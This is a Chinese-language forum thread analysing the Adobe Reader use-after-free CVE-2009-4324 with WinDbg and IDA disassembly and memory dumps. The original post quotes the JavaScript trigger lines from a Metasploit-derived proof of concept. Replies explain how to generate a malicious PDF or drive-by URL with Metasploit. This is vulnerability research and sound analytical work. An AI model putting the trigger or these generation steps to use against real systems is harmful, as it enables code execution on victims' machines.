首页
论坛
课程
招聘
仙果
雪    币: 763
活跃值: 活跃值 (56)
能力值: (RANK:830 )
在线值:
发帖
69
回帖
1505
粉丝
10

[原创]Adobe reader 漏洞CVE-2009-4324初步分析

2010-1-10 02:34 7722

[原创]Adobe reader 漏洞CVE-2009-4324初步分析

2010-1-10 02:34
7722
文章名称:CVE-2009-4324初步分析
目录:
0x1.漏洞描述
0x2.测试环境
0x3.初步分析
0x3.1.POC样本获取
0x3.2.跟踪调试
0x4.总结

正文:
1.漏洞描述
CVE ID: CVE-2009-4324

Adobe Acrobat和Reader都是非常流行的PDF文件阅读器。

Adobe Reader和Acrobat阅读器支持JavaScript。Doc.media对象的newplayer()方式存在释放后使用漏洞,
可能触发可利用的内存访问破坏。
远程攻击者可以通过使用ZLib压缩流的特制PDF文件来利用这个漏洞,导致执行任意代码。

2.测试环境
系统环境:windws XP SP3_CN
软件环境:Adobe Reader 8.12_CN
工具    :Windbg IDA (本来想用OD,可惜不熟悉)

3.初步分析
3.1.样本获取
从http://downloads.securityfocus.com/vulnerabilities/exploits/adobe_media_newplayer.rb
下载到一个RB文件,导入到Metasploit中,提示有CVE-2009-4324项目
经过一番折腾后,最后得到测试POC样本。
提取出触发漏洞的Javascript 代码,确定关键代码如下:
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());

查阅网上相关资料,有这么一句:
漏洞起因是Acrobat JS引擎在实现doc.media.newPlayer函数的null参数异常时,
使用到的某指针指向的内存未初始化,准确地说那是一片之前已释放的堆块。

这是网上资料,接下来在调试器中进行跟踪调试
23827ef8 6a00            push    0
23827efa 6a00            push    0
23827efc 68ecd78f23      push    offset EScript!PlugInMain+0xfc43c (238fd7ec)
23827f01 57              push    edi
23827f02 ffd0            call    eax {Multimedia!PlugInMain+0x40b05 (2d841e82)}

函数 23827f02 call    eax {Multimedia!PlugInMain+0x40b05 (2d841e82)} 
经过27次调用后,执行函数SUB_2D841E82的代码,即漏洞利用函数
此时寄存器状态为:
0:000> r
eax=2d841e82 ebx=23827e5d ecx=032e5ce0 edx=0012fb60 esi=032e5ce0 edi=032e5ce0
eip=23827f02 esp=0012fb40 ebp=0012fbb4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
EScript!PlugInMain+0x26b52:
23827f02 ffd0            call    eax {Multimedia!PlugInMain+0x40b05 (2d841e82)}

可以发现 ecx=esi=edi=032e5ce0
         ebx为一个数字
SUB_2D841E82:
2d841e82 56              push    esi
2d841e83 8b742408        mov     esi,dword ptr [esp+8]
2d841e87 85f6            test    esi,esi
2d841e89 7422            je      Multimedia!PlugInMain+0x40b30 (2d841ead) //相等则跳,这里没有跳转
2d841e8b 56              push    esi
2d841e8c e872fcffff      call    Multimedia!PlugInMain+0x40786 (2d841b03)   //执行这个函数 下面进入这个函数,看下它是如何执行的
2d841e91 85c0            test    eax,eax
2d841e93 59              pop     ecx
2d841e94 7417            je      Multimedia!PlugInMain+0x40b30 (2d841ead)
2d841e96 8b10            mov     edx,dword ptr [eax]
2d841e98 8bc8            mov     ecx,eax
2d841e9a ff5204          call    dword ptr [edx+4]                           //伪造的数据在此处利用
2d841e9d 6a00            push    0
2d841e9f 6870558c2d      push    offset Multimedia!PlugInMain+0xc41f3 (2d8c5570)
2d841ea4 56              push    esi
2d841ea5 e8ead3fdff      call    Multimedia!PlugInMain+0x1df17 (2d81f294)
2d841eaa 83c40c          add     esp,0Ch
2d841ead 66b80100        mov     ax,offset <Unloaded_I.DLL> (00000001)
2d841eb1 5e              pop     esi
2d841eb2 c3              ret



.text:2D841B03 sub_2D841B03    proc near               ; CODE XREF: sub_2D841E82+Ap
.text:2D841B03                                         ; sub_2D8432A1+7B0p ...
.text:2D841B03
.text:2D841B03 arg_0           = dword ptr  4
.text:2D841B03
.text:2D841B03                 push    offset aMediaplayer_th ; "MediaPlayer_This" push offset aMediaplayer_th 
.text:2D841B08                 push    [esp+4+arg_0]   ; 取得MediaPlayer_This的偏移并压入堆栈
.text:2D841B0C                 call    sub_2D81F039     //在此处调用2D81F039这个函数
.text:2D841B11                 pop     ecx
.text:2D841B12                 pop     ecx
.text:2D841B13                 retn
.text:2D841B13 sub_2D841B03    endp



sub_2D81F039:
.text:2D81F039 sub_2D81F039    proc near               ; CODE XREF: _malloc+Ap
.text:2D81F039                                         ; _malloc_0+Ap ...
.text:2D81F039
.text:2D81F039 var_44          = byte ptr -44h
.text:2D81F039 var_4           = dword ptr -4
.text:2D81F039 arg_0           = dword ptr  8
.text:2D81F039 arg_4           = dword ptr  0Ch
.text:2D81F039
.text:2D81F039                 push    ebp
.text:2D81F03A                 mov     ebp, esp
.text:2D81F03C                 sub     esp, 44h
.text:2D81F03F                 lea     eax, [ebp+var_44]
.text:2D81F042                 push    offset sub_2D809C95
.text:2D81F047                 push    eax
.text:2D81F048                 mov     eax, dword_2D90EF58
.text:2D81F04D                 call    dword ptr [eax+8] ; 进入 AcroRd32_950000!ACPushExceptionFrame 函数处理流程
.text:2D81F050                 lea     eax, [ebp+var_44]
.text:2D81F053                 push    0
.text:2D81F055                 push    eax
.text:2D81F056                 call    _setjmp3        ;  调用MSVCR80!__setjmp3进行处理  setjmp3返回值为0
.text:2D81F05B                 add     esp, 10h
.text:2D81F05E                 test    eax, eax
.text:2D81F060                 jnz     short loc_2D81F082
.text:2D81F062                 push    [ebp+arg_4]
.text:2D81F065                 mov     eax, dword_2D90F9DC   //把2D90F9DC地址的值赋值给eax
.text:2D81F06A                 push    [ebp+arg_0]
.text:2D81F06D                 call    dword ptr [eax+23Ch]  // 返回值[eax]中出现提交的数据,[eax]为输入的数据 unicode的形式,
.text:2D81F073                 pop     ecx
.text:2D81F074                 mov     [ebp+var_4], eax       //把参数赋值到[ebp+4]
.text:2D81F077                 mov     eax, dword_2D90EF58
.text:2D81F07C                 pop     ecx
.text:2D81F07D                 call    dword ptr [eax+0Ch] //ACPopExceptionFrame函数处理流程】
.text:2D81F080                 jmp     short loc_2D81F099
.text:2D81F082 ; ---------------------------------------------------------------------------

.text:2D81F098                 pop     ecx
.text:2D81F099
.text:2D81F099 loc_2D81F099:                           ; CODE XREF: sub_2D81F039+47j
.text:2D81F099                 mov     eax, [ebp+var_4]        //把之前保存的地址赋值回EAX
.text:2D81F09C                 leave
.text:2D81F09D                 retn

MSDN上关于setjmp的解释不甚理解,所以就在《UNIX环境高级编程》中文版中查找到相关的介绍,
C语言在windows和unix中是相通的。
setjmp和longjmp函数
在C中,不允许使用跳越函数的goto语句。而执行这种跳转功能的是函数setjmp和longjmp。
这两个函数对于处理发生在很深的嵌套函数调用中的出错情况非常有用。

非局部跳转—— setjmp和longjmp函数。非局部表示这不是在
一个函数内的普通的C语言goto语句,而是在栈上跳过若干调用帧,返回到当前函数调用路径
上的一个函数中。
call    dword ptr [eax+23Ch]:
382dd5c 56              push    esi
2382dd5d 8b742408        mov     esi,dword ptr [esp+8]
2382dd61 57              push    edi
2382dd62 33ff            xor     edi,edi
2382dd64 eb20            jmp     EScript!PlugInMain+0x2c9d6 (2382dd86)
2382dd66 ff742410        push    dword ptr [esp+10h]
2382dd6a ff7610          push    dword ptr [esi+10h]
2382dd5c 56              push    esi
2382dd5d 8b742408        mov     esi,dword ptr [esp+8]
2382dd61 57              push    edi
2382dd62 33ff            xor     edi,edi
2382dd64 eb20            jmp     EScript!PlugInMain+0x2c9d6 (2382dd86)
2382dd66 ff742410        push    dword ptr [esp+10h]
2382dd6a ff7610          push    dword ptr [esi+10h]
2382dd6d e82fb1ffff      call    EScript!PlugInMain+0x27af1 (23828ea1)          //在这个函数中进行处理
2382dd72 8bf8            mov     edi,eax
2382dd74 85ff            test    edi,edi
2382dd76 59              pop     ecx
2382dd77 59              pop     ecx
2382dd78 7510            jne     EScript!PlugInMain+0x2c9da (2382dd8a)
2382dd7a 6a01            push    1
2382dd7c 56              push    esi
2382dd7d e87e21feff      call    EScript!PlugInMain+0xeb50 (2380ff00)
2382dd82 59              pop     ecx
2382dd83 59              pop     ecx
2382dd84 8bf0            mov     esi,eax
2382dd86 85f6            test    esi,esi
2382dd88 75dc            jne     EScript!PlugInMain+0x2c9b6 (2382dd66)
2382dd8a 8bc7            mov     eax,edi
2382dd8c 5f              pop     edi
2382dd8d 5e              pop     esi
2382dd8e c3              ret




2382dd6d call 23828ea1:
23828ea1 33c0            xor     eax,eax
23828ea3 39442404        cmp     dword ptr [esp+4],eax 
23828ea7 7405            je      EScript!PlugInMain+0x27afe (23828eae)  //相等则跳
23828ea9 e92783feff      jmp     EScript!PlugInMain+0xfe25 (238111d5)

238111d5 55              push    ebp
238111d6 8bec            mov     ebp,esp
238111d8 56              push    esi
238111d9 ff750c          push    dword ptr [ebp+0Ch]
238111dc e8dd4bffff      call    EScript!PlugInMain+0x4a0e (23805dbe)
238111e1 8b4d0c          mov     ecx,dword ptr [ebp+0Ch]
238111e4 50              push    eax                              //eax=0x10 函数23805dbe的返回值
238111e5 ba0ff00000      mov     edx,offset <Unloaded_I.DLL>+0xf00e (0000f00f)
238111ea e803610400      call    EScript!PlugInMain+0x55f42 (238572f2)
238111ef 8b4d08          mov     ecx,dword ptr [ebp+8]
238111f2 8d5508          lea     edx,[ebp+8]
238111f5 52              push    edx
238111f6 ff750c          push    dword ptr [ebp+0Ch]
238111f9 83e00f          and     eax,0Fh
238111fc ff748140        push    dword ptr [ecx+eax*4+40h]
23811200 8d3481          lea     esi,[ecx+eax*4]
23811203 ff36            push    dword ptr [esi]
23811205 e874600400      call    EScript!PlugInMain+0x55ece (2385727e)  //在此函数中,EAX被清零,即EAX=0
2381120a 83c418          add     esp,18h
2381120d 66837d0800      cmp     word ptr [ebp+8],0
23811212 7408            je      EScript!PlugInMain+0xfe6c (2381121c)
23811214 8b0e            mov     ecx,dword ptr [esi]
23811216 8b44c104        mov     eax,dword ptr [ecx+eax*8+4] ds:0023:0400374c=033e3ab8  //出现提交的数据
2381121a eb02            jmp     EScript!PlugInMain+0xfe6e (2381121e)
2381121c 33c0            xor     eax,eax
2381121e 5e              pop     esi
2381121f 5d              pop     ebp
23811220 c3              ret

23811216 时,寄存器状态
eax=00000000 ebx=23827e5d ecx=04003748 edx=2d8c5580 esi=03ffd998 edi=00000000
eip=23811216 esp=0012fab4 ebp=0012fab8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200202
EScript!PlugInMain+0xfe66:
23811216 8b44c104        mov     eax,dword ptr [ecx+eax*8+4] ds:0023:0400374c=033e3ab8
0:000> ? ecx+eax*8+4
Evaluate expression: 67123020 = 0400374c
0:000> d ecx+eax*8+4
0400374c  b8 3a 3e 03 c0 14 2e 03-38 3b 84 2d 00 00 00 00  .:>.....8;.-....
0400375c  00 00 00 00 00 00 00 00-18 00 18 00 c0 8c 3f 00  ..............?.
0400376c  00 00 00 00 76 69 73 69-62 6c 65 00 68 3a 00 04  ....visible.h:..
0400377c  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
0400378c  18 00 18 00 c0 8c 3f 00-00 00 00 00 6f 75 74 65  ......?.....oute
0400379c  72 52 65 63 74 00 00 00-01 00 00 00 00 00 00 00  rRect...........
040037ac  00 00 00 00 00 00 00 00-18 00 18 00 c0 8c 3f 00  ..............?.
040037bc  00 00 00 00 e8 37 00 04-2f 40 84 2d 00 00 00 00  .....7../@.-....
0:000> d 033e3ab8
033e3ab8  31 00 2e 00 33 00 34 00-35 00 36 00 37 00 38 00  1...3.4.5.6.7.8.
033e3ac8  39 00 30 00 31 00 2e 00-33 00 34 00 35 00 36 00  9.0.1...3.4.5.6.
033e3ad8  37 00 38 00 39 00 30 00-31 00 2e 00 33 00 34 00  7.8.9.0.1...3.4.
033e3ae8  35 00 36 00 20 00 3a 00-20 00 31 00 2e 00 33 00  5.6. .:. .1...3.
033e3af8  31 00 2e 00 33 00 34 00-00 00 00 00 00 00 00 00  1...3.4.........
033e3b08  0b 00 0b 00 ea 01 08 04-e8 3c 3f 03 b8 3a 3e 03  .........<?..:>.
033e3b18  b8 3a 3e 03 00 00 00 00-a0 00 00 00 00 00 00 00  .:>.............
033e3b28  00 00 00 00 00 00 00 00-50 c8 2d 03 00 00 00 00  ........P.-.....


0x4.总结
到此,CVE-2009-4324的初步分析就到这里,可以看出程序在23811216处引用了已经被释放的内存,
造成漏洞可以很容易的被利用,
其中还有很多需要理解的地方
1.SetJmp函数是何作用
2.ACPushExceptionFrame 的执行流程如何
3.对此漏洞的形成原因还有待进一步理解

CVE-2009-4324初步分析.pdf
poc.pdf
info.rar
上传的附件:
最新回复 (14)
仙果
雪    币: 763
活跃值: 活跃值 (56)
能力值: (RANK:830 )
在线值:
发帖
69
回帖
1505
粉丝
10
仙果 活跃值 19 2010-1-10 02:38
2
0
POC大家自行下载哈
是从网络的POC代码自动的
lovehaohui
雪    币: 381
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
0
回帖
16
粉丝
0
lovehaohui 活跃值 2010-1-10 14:06
3
0
学习了~
hufo
雪    币: 247
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
1
回帖
22
粉丝
0
hufo 活跃值 2010-1-10 18:12
4
0
学习!谢谢分享
youstar
雪    币: 226
活跃值: 活跃值 (10)
能力值: ( LV8,RANK:130 )
在线值:
发帖
16
回帖
284
粉丝
0
youstar 活跃值 2 2010-1-10 21:30
5
0
原来研究了下POC,也用Metasploit 生成几个POC,没去调试,感谢分享!学习!
momoomo
雪    币: 213
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
0
回帖
8
粉丝
0
momoomo 活跃值 2010-1-11 14:30
6
0
小改了poc到plaintext :)
上传的附件:
snowdbg
雪    币: 3133
能力值: (RANK:250 )
在线值:
发帖
13
回帖
130
粉丝
0
snowdbg 活跃值 6 2010-1-11 15:24
7
0
顶一顶~~分析的不错
Sportsboy
雪    币: 71
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
5
回帖
21
粉丝
0
Sportsboy 活跃值 2010-1-12 15:15
8
0
请问5楼的同志,,利用metasploit如何生成poc。。。比如这个例子中得到adobe_media_newplayer.rb文件,然后如何生成poc呢?请指导。我的qq是:65147098
CoolWolF
雪    币: 230
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
6
回帖
118
粉丝
0
CoolWolF 活跃值 2010-1-12 15:47
9
0
有深度,学习~
youstar
雪    币: 226
活跃值: 活跃值 (10)
能力值: ( LV8,RANK:130 )
在线值:
发帖
16
回帖
284
粉丝
0
youstar 活跃值 2 2010-1-12 16:23
10
0
metasploit选择漏洞后一步一步选择就行了,最后就生成一个PDF了! 《0day》上面有讲使用方法的,网上也有电子版的,可以看下!
Sportsboy
雪    币: 71
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
5
回帖
21
粉丝
0
Sportsboy 活跃值 2010-1-12 17:06
11
0
《0day》上面有说把poc.rb放在正确的目录下是指哪个目录?还有就是你说一步一步配置那最后的pdf文件保存在哪儿啊?我只知道rb文件的地方。我实在是有点迷惑。。
仙果
雪    币: 763
活跃值: 活跃值 (56)
能力值: (RANK:830 )
在线值:
发帖
69
回帖
1505
粉丝
10
仙果 活跃值 19 2010-1-12 17:32
12
0
默认安装的话是在此目录下:

C:\Program Files\Metasploit\Framework3\msf3\data\exploits
名字自己可以选择
默认为msf.pdf
momoomo
雪    币: 213
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
0
回帖
8
粉丝
0
momoomo 活跃值 2010-1-12 17:36
13
0
这个漏洞在metasploit有两种启动方法
-> 生成pdf文件
-> 生成url

生成url的方法就是会有一个网址,类似网马般运用
生成pdf文件,OUTPUTPATH就是设定文件保存的地方,预设在/msf3/data/exploits
仙果
雪    币: 763
活跃值: 活跃值 (56)
能力值: (RANK:830 )
在线值:
发帖
69
回帖
1505
粉丝
10
仙果 活跃值 19 2010-1-12 17:38
14
0
正解
呵呵
  我没有注意到
PEYlxZ
雪    币: 155
活跃值: 活跃值 (10)
能力值: ( LV3,RANK:30 )
在线值:
发帖
2
回帖
124
粉丝
0
PEYlxZ 活跃值 2012-10-31 14:26
15
0
可以请问下,是怎么转换的么?
游客
登录 | 注册 方可回帖
返回